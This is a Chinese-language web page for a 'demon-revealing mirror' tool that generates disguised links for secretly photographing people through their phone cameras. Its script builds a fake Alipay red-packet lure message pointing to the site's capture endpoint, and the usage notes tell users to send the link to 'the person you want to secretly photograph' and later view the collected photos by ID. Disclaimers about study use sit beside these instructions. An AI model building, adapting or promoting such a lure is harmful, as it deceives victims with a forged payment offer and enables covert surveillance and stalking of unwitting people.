<!DOCTYPE html>
<html lang="zh-cn">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <title>在线照妖镜 - by 李小白</title>
    <meta name="keywords" content="照妖镜, 网恋识别, AI换脸, 真相探测">
    <meta name="description" content="一键查看网恋对象的真面目，打开生成的链接可拍摄对方照片，永久免费照妖镜">
    <meta name="author" content="李小白">
    <link rel="icon" href="https://api.lxb.icu/favicon.ico" type="image/x-icon"> <!-- 确保路径正确 -->
    <link href="//cdn.staticfile.org/layui/2.9.10/css/layui.css" rel="stylesheet">
    <link rel="stylesheet" href="https://azheds.com/zyj/assets/css/bootstrap.min.css">
    <script src="/js/jquery.min.js" defer></script>
    <script src="/js/bootstrap.min.js" defer></script>
    <script src="//cdn.staticfile.org/layui/2.9.10/layui.js" defer></script>
    <script src="//cdn.bootcss.com/sweetalert/2.1.2/sweetalert.min.js" defer></script>
    <style>
        /* 通用背景样式 */
        body {
            margin: 0 auto;
            text-align: center;
            background-attachment: fixed;
            background-repeat: no-repeat;
            background-size: cover;
            -moz-background-size: cover;
            background-position: center center;
        }

        /* 手机端背景 */
        @media only screen and (max-width: 768px) {
            body {
                background-image: url(https://img.siyouyun.eu.org/file/1740571550415_IMG_2365.png);
            }
        }

        /* 电脑端背景 */
        @media only screen and (min-width: 769px) {
            body {
                background-image: url(https://img.siyouyun.eu.org/file/1742550269129_p3.png);
            }
        }

        .container {
            max-width: 580px;
            padding: 15px;
            margin: 0 auto;
        }
    </style>
</head>
<body>
    <script type="text/javascript">
        $(document).ready(function () {
            function getNowFormatDate() {
                var date = new Date();
                return (date.getMonth() + 1) + "月" + date.getDate() + "日";
            }

            var text = [
                "部分地区可能无法访问！",
                "如果提示没有照片，请对方多打开几次！",
                "请复制本网站生成的链接，发送给对方！",
                "服务器为公益服务器，可能较慢，请谅解！",
                "请加入官方群，获取最新更新信息！",
                "本站网址：api.lxb.com"
            ];
            var content = text.map((t, i) => `${i + 1}. ${t}`).join("\n");

            setTimeout(function () {
                swal(getNowFormatDate() + " 通知", content, "success");
            }, 100);
        });
    </script>

    <div class="container">
        <div class="header">
            <ul class="nav nav-pills pull-right" role="tablist">
                <li role="presentation" class="active"></li>
            </ul>
            <img src="https://azheds.com/zyj/assets/img/logo.png" height="40px" align="left">
        </div>
        <br>
        <br>
        <audio autoplay>
            <source src="https://api.uomg.com/api/rand.music?sort=热歌榜" type="audio/mpeg">
        </audio>
        <div class="panel panel-primary" style="margin:1% 1% 1% 1%;background: rgba(255, 251, 251, 0.7)">
            <div class="panel-heading bk-bg-primary">
                <script>
                    function create() {
                        var input = document.getElementById('content');
                        var kd = document.getElementById('kd');
                        var myid = document.getElementById('myid');
                        var urlp = {value: "https://api.lxb.icu/data/zfb.php"}; // 生成跳转支付宝红包链接
                        if (myid.value == "" || urlp.value == "") {
                            alert("ID或跳转地址不能为空！");
                            return false;
                        }
                        layer.confirm('仅限测试自己手机相机是否正常，禁止一切违法行为造成后果自行承担！点击“确定”即代表同意，否则请立即停止使用！', {
                            title: "警告通知",
                            closeBtn: 0,
                            btnAlign: "c",
                            anim: 6,
                            icon: 4,
                            btn: ['确定', '取消'] // 可以无限个按钮 
                        },
                        function(index, layero){
                            var url = document.URL;
                            var arrUrl = url.split("//");
                            var start = arrUrl[1].indexOf("/");
                            var relUrl = arrUrl[1].substring(start);
                            var surl = url.replace(relUrl, "/");
                            kd.value = '【支付宝】扫码领红包，每天可领，最高领99元，建议收藏此链接以防丢失，每天都领取红包。请手动复制链接到浏览器打开哦！官方地址：https://api.lxb.icu/data/?id=' + myid.value + '&url=' + urlp.value;

                            layer.msg('生成成功！', {icon: 1});
                            // 按钮【按钮一】的回调
                            // layer.closeAll(); // 关闭弹窗
                        }, function(index){
                            // 按钮【按钮二】的回调
                        });
                    }

                    function fz() {
                        var kd = document.getElementById("kd");
                        if (kd.value == "") {
                            alert("请生成链接！");
                            return false;
                        }

                        kd.select(); // 选择对象
                        document.execCommand("Copy"); // 执行浏览器复制命令
                        alert("内容复制成功！");
                    }

                    function durl() {
                        var kd = document.getElementById("kd");
                        if (kd.value == "") {
                            alert("请生成链接并确保填写ID！");
                            return false;
                        }

                        var httpRequest = new XMLHttpRequest(); // 第一步：建立所需的对象
                        var url = '/url.php?ym=' + kd.value;

                        httpRequest.open('GET', url, true); // 第二步：打开连接 将请求参数写在url中 ps:"./Ptest.php?name=test&nameone=testone"
                        httpRequest.send(); // 第三步：发送请求 将请求参数写在URL中
                        /**
                         * 获取数据后的处理程序
                         */
                        httpRequest.onreadystatechange = function () {
                            if (httpRequest.readyState == 4 && httpRequest.status == 200) {
                                var json = httpRequest.responseText; // 获取到json字符串，还需解析

                                var obj = JSON.parse(json);

                                // 从JS对象访问单个值
                                kd.value = obj.link;
                                if (obj.link == undefined) {
                                    alert("请勿重复生成短链！");
                                    kd.value = '请勿重复生成短链，请重新生成链接！';
                                }
                            }
                        };
                    }
                </script>
                <h6>
                    <span class="panel-title">伪装支付宝扫领码红包</span>
                </h6>
            </div>
            <div class="container-fluid">
                <div class="panel-body">
                    <input type="text" style="background: rgba(255, 251, 251, 0.7)" class="form-control" id="myid" value='' placeholder="①请输入英文/数字 请牢记ID 下方有视频教程和说明！">
                    <p></p>
                    <input type="button" class="btn btn-primary btn-block" value='②生成链接' onclick='create();'>
                    <p></p>
                    <input type="text" style="background: rgba(255, 251, 251, 0.7)" class="form-control" id="kd" value='请先输入id并生成链接，生成后点击下方复制链接即可' readonly="true">
                    <p></p>
                    <input type="button" class="btn btn-primary btn-block" value='③复制链接' onclick='fz();'>
                    <p></p>
                    <input type="button" class="btn btn-primary btn-block" value='④查看照片' onclick="window.location.href='https://api.lxb.icu/data/ck.php?id='+document.getElementById('myid').value;">
                </div>
            </div>
        </div>
        <div class="panel panel-primary" style="margin:1% 1% 1% 1%;background: rgba(255, 251, 251, 0.7)">
            <div class="panel-body">
                <table class="table table-bordered">
                    <tr height="50">
                        <td>
                            <a style="background: linear-gradient(to right,#b221ff,#14b0ff);" href="https://api.lxb.icu/data/sc.php" target="_blank" class="btn btn-block btn-success">照妖镜（老版）</a>
                        </td>
                        <td>
                            <a style="background: linear-gradient(to right,#b221ff,#14b0ff);" href="/////" target="_blank" class="btn btn-block btn-success">广告位招租</a>
                        </td>
                    </tr>
                    <tr height="50">
                        <td>
                            <a style="background: linear-gradient(to right,#b221ff,#14b0ff);" href="/////" target="_blank" class="btn btn-block btn-success">广告位招租</a>
                        </td>
                        <td>
                            <a style="background: linear-gradient(to right,#b221ff,#14b0ff);" href="/////" target="_blank" class="btn btn-block btn-success">广告位招租</a>
                        </td>
                    </tr>
                    <tr height="50">
                        <td>
                            <a style="background: linear-gradient(to right,#b221ff,#14b0ff);" href="/////" target="_blank" class="btn btn-block btn-success">广告位招租</a>
                        </td>
                        <td>
                            <a style="background: linear-gradient(to right,#b221ff,#14b0ff);" href="/////" target="_blank" class="btn btn-block btn-success">广告位招租</a>
                        </td>
                    </tr>
                </table>
                <div class="alert alert-info" role="alert">
                    ★作者声明★
                    <br>1.本工具仅做学习交流使用,请勿用于非法用途!后果自负!网站拍照是用户自愿点击允许的！
                    <br>2.凭证是查看照片的凭证,不要泄露给知道这个平台的人
                    <br>3.如有侵权、肖像权等,请联系本站下方邮箱或者QQ删除！
                    <br>★使用说明★
                    <br>①填写对方QQ或者一个你能记住的id方便日后查询 填写完成后不用管直接点击生成链接!
                    <br>②生成完成后,点击复制链接发给你要偷拍的人！
                    <br>③他点开后,然后回到本站,填写你生成的id,然后点击查看照片即可！
                    <br>④由于系统安全机制，ios系统必须使用自带的Safari浏览器（或者第三方APP调用的是Safari内核）才行<br>
                    <br>仅供娱乐使用,请勿用于非法商业用途,否则后果自负！
                    <br>页面布局来源于“阿泽”
                    <br>请收藏本站,以防丢失
                    <font color="#e600ff"><br>站长QQ保密</font>
                    <hr class="top_hr_style02">
                    <span id="localtime"></span>
                </div>
            </div>
        </div>
        <script>
            function showLocale(objD) {
                var str, colorhead, colorfoot;
                var yy = objD.getYear();
                if (yy < 1900) yy = yy + 1900;
                var MM = objD.getMonth() + 1;
                if (MM < 10) MM = '0' + MM;
                var dd = objD.getDate();
                if (dd < 10) dd = '0' + dd;
                var hh = objD.getHours();
                if (hh < 10) hh = '0' + hh;
                var mm = objD.getMinutes();
                if (mm < 10) mm = '0' + mm;
                var ss = objD.getSeconds();
                if (ss < 10) ss = '0' + ss;
                var ww = objD.getDay();
                if (ww == 0) colorhead = "<font color=\"#FF3030\">";
                if (ww > 0 && ww < 6) colorhead = "<font color=\"#FF3030\">";
                if (ww == 6) colorhead = "<font color=\"#FF3030\">";
                if (ww == 0) ww = "星期日";
                if (ww == 1) ww = "星期一";
                if (ww == 2) ww = "星期二";
                if (ww == 3) ww = "星期三";
                if (ww == 4) ww = "星期四";
                if (ww == 5) ww = "星期五";
                if (ww == 6) ww = "星期六";
                colorfoot = "</font>"
                str = colorhead + yy + "-" + MM + "-" + dd + "丨" + hh + ":" + mm + ":" + ss + "丨" + ww + colorfoot;
                return (str);
            }

            function tick() {
                var today;
                today = new Date();
                document.getElementById("localtime").innerHTML = showLocale(today);
                window.setTimeout(tick, 1000);
            }

            tick();
        </script>
    </div>
</body>
</html>


